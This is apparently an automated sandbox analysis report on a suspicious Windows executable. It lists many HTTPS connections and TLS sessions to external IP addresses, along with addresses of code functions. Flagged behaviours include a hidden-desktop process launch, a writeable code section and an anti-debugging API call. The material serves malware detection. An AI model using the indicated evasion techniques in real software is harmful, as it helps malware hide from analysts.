Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.13.32.95:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.147.1:443 -> 192.168.2.5:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.147.1:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50079 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00618DEA _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcpyA,_memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00618DEA

System Summary

PE file has a writeable .text section

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0061144B GetCurrentProcess,NtQueryInformationProcess,

0_2_0061144B

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00617FAB	0_2_00617FAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063F1B3	0_2_0063F1B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063EA43	0_2_0063EA43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062DC54	0_2_0062DC54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062ACEC	0_2_0062ACEC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063EDE1	0_2_0063EDE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063E5AE	0_2_0063E5AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0063F59B	0_2_0063F59B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062CEF4	0_2_0062CEF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C436C00	0_2_6C436C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C37AC60	0_2_6C37AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C44AC30	0_2_6C44AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3CECD0	0_2_6C3CECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C36ECC0	0_2_6C36ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C49AD50	0_2_6C49AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C43ED70	0_2_6C43ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F8D20	0_2_6C4F8D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C374DB0	0_2_6C374DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4FCDC0	0_2_6C4FCDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C406D90	0_2_6C406D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C40EE70	0_2_6C40EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C450E20	0_2_6C450E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C410EC0	0_2_6C410EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3F6E90	0_2_6C3F6E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C37AEC0	0_2_6C37AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C376F10	0_2_6C376F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C432F70	0_2_6C432F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B0F20	0_2_6C4B0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3DEF40	0_2_6C3DEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C37EFB0	0_2_6C37EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C44EFF0	0_2_6C44EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C370FE0	0_2_6C370FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B8FB0	0_2_6C4B8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C444840	0_2_6C444840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3C0820	0_2_6C3C0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3FA820	0_2_6C3FA820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4768E0	0_2_6C4768E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3C6900	0_2_6C3C6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3A8960	0_2_6C3A8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C48C9E0	0_2_6C48C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3A49F0	0_2_6C3A49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4009A0	0_2_6C4009A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C42A9A0	0_2_6C42A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4309B0	0_2_6C4309B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C41EA00	0_2_6C41EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3ECA70	0_2_6C3ECA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C428A30	0_2_6C428A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3EEA80	0_2_6C3EEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C476BE0	0_2_6C476BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C410BA0	0_2_6C410BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3FA430	0_2_6C3FA430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D4420	0_2_6C3D4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C388460	0_2_6C388460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C40A4D0	0_2_6C40A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C49A480	0_2_6C49A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3B64D0	0_2_6C3B64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C474540	0_2_6C474540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B8550	0_2_6C4B8550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C410570	0_2_6C410570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D2560	0_2_6C3D2560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3C8540	0_2_6C3C8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3645B0	0_2_6C3645B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C43A5E0	0_2_6C43A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3FE5F0	0_2_6C3FE5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3CC650	0_2_6C3CC650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C40E6E0	0_2_6C40E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3CE6E0	0_2_6C3CE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3946D0	0_2_6C3946D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3F0700	0_2_6C3F0700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C39A7D0	0_2_6C39A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C43C000	0_2_6C43C000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3BE070	0_2_6C3BE070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C438010	0_2_6C438010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3800B0	0_2_6C3800B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C368090	0_2_6C368090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C44C0B0	0_2_6C44C0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3E6130	0_2_6C3E6130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C454130	0_2_6C454130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D8140	0_2_6C3D8140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3701E0	0_2_6C3701E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C408250	0_2_6C408250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C43A210	0_2_6C43A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3F8260	0_2_6C3F8260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C448220	0_2_6C448220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F62C0	0_2_6C4F62C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4422A0	0_2_6C4422A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C43E2B0	0_2_6C43E2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3E2320	0_2_6C3E2320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C48C360	0_2_6C48C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C406370	0_2_6C406370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B2370	0_2_6C4B2370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C372370	0_2_6C372370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C378340	0_2_6C378340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3CE3B0	0_2_6C3CE3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3A23A0	0_2_6C3A23A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3C43E0	0_2_6C3C43E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C381C30	0_2_6C381C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C499C40	0_2_6C499C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C373C40	0_2_6C373C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4ADCD0	0_2_6C4ADCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C431CE0	0_2_6C431CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C40FC80	0_2_6C40FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3D3D00	0_2_6C3D3D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C441DC0	0_2_6C441DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C363D80	0_2_6C363D80
